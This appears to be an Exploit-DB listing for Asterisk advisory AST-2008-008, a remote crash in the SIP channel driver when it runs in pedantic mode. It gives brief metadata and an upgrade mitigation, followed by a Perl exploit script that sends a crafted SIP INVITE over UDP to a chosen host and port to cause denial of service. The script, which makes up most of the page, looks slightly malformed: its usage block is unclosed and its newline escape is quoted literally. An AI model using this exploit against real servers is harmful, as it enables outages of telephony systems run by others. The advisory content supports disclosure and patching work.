Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

vendor:

Asterisk

by:

armando.j.m.o@gmail.com

7.5

CVSS

HIGH

Remote Crash Vulnerability

119

CWE

Product Name: Asterisk

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: AST-2008-008

CPE: a:digium:asterisk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

A vulnerability exists in the SIP channel driver when run in pedantic mode, which can be exploited by sending a specially crafted INVITE request to the affected system. Successful exploitation may allow an attacker to cause a denial of service.

Mitigation:

Upgrade to the latest version of Asterisk.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by armando.j.m.o@gmail.com
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", \%args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!\n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};

# milw0rm.com [2008-06-05]